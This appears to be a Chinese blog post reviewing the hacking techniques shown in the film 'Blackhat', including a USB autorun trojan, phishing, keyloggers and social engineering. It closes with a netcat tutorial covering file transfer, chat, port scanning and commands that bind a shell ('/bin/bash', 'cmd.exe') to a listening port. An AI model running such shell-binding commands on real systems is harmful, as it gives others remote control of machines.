电影《骇客交锋》中的几个命令和黑客技术

看完了电影《骇客交锋》,发现里面的一些技术还是真实的,除了命令,还有U盘木马、社会工程学、钓鱼、键盘记录器等,还是挺丰富的,所以写一篇文章记录下。

write命令

write命令可传递信息给另一位登入系统的用户。

雷神黑入的凶手的电脑并用write命令对话

cat、xxd命令与U 盘自动执行脚本

cat 打印文件内容到显示器上
xxd 查看Linux文件的二进制表示,在线二进制文件查看器

autorun.inf放在u盘里插上windows电脑会自动运行,上面的代码是自动执行.mssvc里的代码
U 盘就是漏洞

电影中只有上图这位帅哥有权限打开关键电脑,而且是指纹认证,所以其他人很难开机去操作电脑。但是这个人通常把U 盘放电脑桌上,也就是他的U 盘被人动过手脚,拿走写入上面的脚本还回来,他登录电脑插上此U盘,上面的木马程序.mssvc 就执行了。

当然给U盘动手脚的那个人也只是一个人肉脚本,所最终是被kill 了。

洋葱网络

凶手与人肉脚本通过洋葱路由(暗网)来通信隐藏IP

who,whois 命令

通过阅读人肉脚本与凶手的邮件,并通过邮件约到指定地点(Ham Ji Park Restaurant)见面。

发现凶手没来,而且还被凶手黑到的摄像头监控着,雷神跑到监控室敲出who命令,看谁登录了这台机器 – sdksdk 以及登录IP
雷神用write 命令和凶手通信

频谱分析仪

钓鱼邮件与键盘记录器

键盘记录器JS版

社会工程学与nc命令

nc命令启动并监听8080端口,这里没看明白什么意思

Mac 自带nc命令,Windows 需下载nc.exe (https://github.com/markbuild/netcat)

# 传文件, Mac1 监听5901端口,-l 代表监听
Mac1 % nc -l 5901>photoshop.dmg
Mac2 % nc 10.9.9.8 5901 < Adobe_Photoshop_2020_21.0.1.47.dmg
D:\>nc.exe 10.9.9.8 5901 < D:\方案.pptx
# nc聊天
Mac1 % nc -l 1234
D:\>nc.exe -l -p 1234
hello
Mac2 % nc 10.9.9.8 1234
hello
# 端口扫描, -z 代表扫描端口
Mac % nc -z 10.9.9.8 20-444
Connection to 10.9.9.8 port 22 [tcp/ssh] succeeded!

# 反弹服务器shell
Linux1 $ nc -l 6666 -e /bin/bash
Linux2 $ nc 127.0.0.1 6666
[ls
file1
file2
[pwd
/home/root

Win1 $ nc -l -p 6666 -t -e cmd.exe
Win2 $ nc -nvv 10.9.9.8 6666

雷神老师和汤唯老师的教学,你学会了吗?

Leave a Reply

Your email address will not be published. Required fields are marked *